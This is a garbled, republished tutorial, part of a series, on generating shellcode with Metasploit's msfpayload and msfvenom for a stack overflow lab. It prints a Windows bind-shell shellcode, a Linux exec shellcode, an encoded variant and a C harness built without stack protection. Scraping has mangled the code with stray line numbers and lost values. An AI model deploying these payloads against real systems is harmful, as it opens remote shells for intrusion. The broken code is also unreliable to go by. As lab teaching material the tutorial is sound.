Overflow attack using Metasploit stacks-2

Source: Internet
Author: User
Tags windows x64

Basic stack overflow figure out that a very important issue in real-world attacks is shellcode generation.

Using the tools provided by Metasploit, you can easily generate Shellcode, which can then be validated using the code in the first article.

Let's start by saying how to generate Shellcode (all generated under BT5).

Example reference from: Http://www.offensive-security.com/metasploit-unleashed/Msfpayload

To view available payload:

[Email protected]:~# msfpayload-lframework Payloads (251Total )==============================Name Description----                                             -----------Aix/ppc/shell_bind_tcp Listen fora connection and spawn a command shell Aix/ppc/Shell_find_port Spawn A shell on an established connection Aix/ppc/shell_interact Simply execve/bin/SH( forinetd programs) Aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell BSD/sparc/shell_bind_tcp Listen fora connection and spawn a command shell...snip......snip ... windows/x64/shell/bind_tcp Listen fora connection (Windows x64), Spawn a piped command shell (Windows x64) (staged) Windows/x64/shell/reverse_tcp Connect back to the attacker (Windows x64), Spawn a piped command shell (Windows x64) ( Staged) Windows/x64/shell_bind_tcp Listen fora connection and spawn a command shell (Windows x64) Windows/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell (Windows x64) Windows/x64/vncinject/bind_tcp Listen fora connection (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged) Windows/x64/vncinject/reverse_tcp Connect back to the attacker (Windows x64), Inject a VNC Dll via a reflective lo Ader (Windows x64) (staged)

To view the specific payload parameter configuration:

[Email protected]:~# msfpayload windows/shell_bind_tcp o name:windows Command shell, bind TCP Inline module:payload/windows/shell_bind_tcp Version:14774platform:windows arch:x86needs admin:no Total size:341rank:normalprovided by:vlad902 SF Basic options:name current Setting Required Description----      ---------------  --------  -----------Exitfunc Process Yes Exit Technique:seh, thread, process, Nonelport4444Yes the Listen Portrhost no the target Addressdescription:listen  forA connection and spawn a command shell

Finally generate Shellcode, in the example above, generate C language available Shellcode:

[Email protected]:~# msfpayload windows/shell_bind_tcp lport=7777C/** windows/shell_bind_tcp-341 bytes *http://www.metasploit.com* Verbose=false, lport=7777, rhost=, exitfunc=process, * initialautorunscript=, autorunscript=*/unsignedCharBuf[] ="\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30""\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff""\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2""\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85""\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3""\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d""\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58""\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b""\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff""\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68""\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01""\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50""\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7""\x31\xdb\x53\x68\x02\x00\x1e\x61\x89\xe6\x6a\x10\x56\x57\x68""\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5""\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75""\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57""\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01""\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e""\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56""\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56""\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75""\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";

Of course we are in the Linux environment, we need to generate Linux-related shellcode, then we use the Exec payload to generate Shellcode:

[Email protected]:~# msfpayload linux/x86/exec cmd=lsC/** linux/x86/exec-38 bytes *http://www.metasploit.com* Verbose=false, Prependsetresuid=false, * prependsetreuid=false, Prependsetuid=false, * PrependChrootBreak=false , Appendexit=false, Cmd=ls*/unsignedCharBuf[] ="\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68""\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x6c""\x73\x00\x57\x53\x89\xe1\xcd\x80";

OK, now we can verify it in the shell.c of the previous section.

1#include <unistd.h>2 3UnsignedCharlarge_string[ -]; 4 /*5 * linux/x86/exec-38 bytes6  * http://www.metasploit.com7 * Verbose=false, Prependsetresuid=false,8 * Prependsetreuid=false, Prependsetuid=false,9 * Prependchrootbreak=false, Appendexit=false, Cmd=lsTen  */ OneUnsignedCharShellcode[] = A "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68" - "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x6c" - "\x73\x00\x57\x53\x89\xe1\xcd\x80"; the  - void Main () { -     Charbuffer[ the];  -     inti; +     Long*long_ptr = (Long*) large_string;  -      for(i =0; I < sizeof (large_string)/sizeof (int); i++)  +* (long_ptr + i) = (int) buffer;  A  at      for(i =0; I < sizeof (shellcode); i++)  -Large_string[i] =Shellcode[i]; - memcpy (buffer,large_string,sizeof (large_string)); -}

Notice that 25 lines, I used memcpy to replace strcpy, because there are a few 00 of the generated shellcode.

Also use command compilation to generate validation:

gcc -fno-stack-protector-z execstack-g-o shell shell.c[email protected]:/mnt/hgfs/r/stack$./shell

For an example of how to avoid the inclusion of 00 in Shellcode, you can use Msfvenom, as in the example above:

[Email protected]:~# msfvenom-p linux/x86/exec cmd=ls-E X86/shikata_ga_nai-b'\x00'-F c[*] X86/shikata_ga_nai succeeded with size $(iteration=1) unsignedCharBuf[] ="\XDB\XD6\XD9\X74\X24\XF4\XBB\XE3\XA4\X6B\X7E\X58\X2B\XC9\XB1""\x0a\x83\xc0\x04\x31\x58\x15\x03\x58\x15\x01\x51\x01\x75\x9d""\x03\x84\xef\x75\x19\x4a\x79\x62\x09\xa3\x0a\x04\xca\xd3\xc3""\xb6\xa3\x4d\x95\xd5\x66\x7a\xa6\x19\x87\x7a\xc5\x6a\x87\x2d""\x46\x05\x66\x1c\xe8";

But there is a problem, the generated shellcode can not be exploited, will illegal instruction, causing core dump, unknown reason.

Overflow attack using Metasploit stacks-2

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.